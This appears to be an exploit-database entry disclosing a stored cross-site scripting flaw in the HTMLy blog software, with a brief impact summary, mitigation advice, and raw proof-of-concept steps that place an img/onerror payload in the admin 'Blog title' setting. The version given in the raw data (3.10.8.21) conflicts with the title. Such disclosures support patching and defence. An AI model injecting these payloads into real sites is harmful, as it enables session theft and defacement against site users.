header-logo
Suggest Exploit
vendor:
HTMLy
by:
tmrswrr

HTMLy Version v2.9.6 – Stored XSS

The HTMLy version v2.9.6 is vulnerable to stored XSS. An attacker can inject malicious code into the 'Blog title' field, triggering a cross-site scripting attack. This could lead to unauthorized access to user sessions, defacement of the website, or theft of sensitive information.

Mitigation:

To mitigate this vulnerability, input validation should be implemented to sanitize user input and prevent the execution of scripts. Regular security audits and updates are also recommended.
Source

Exploit-DB raw data:

# Exploit Title: HTMLy Version v2.9.6 - Stored XSS
# Exploit Author: tmrswrr 
# Vendor Homepage: https://www.htmly.com/
# Version 3.10.8.21 
# Date : 04/08/2024

1 ) Login admin https://127.0.0.1/HTMLy/admin/config
2 ) General Setting > Blog title >  "><img src=x onerrora=confirm() onerror=confirm(1)> 
3 ) After save it you will be see XSS alert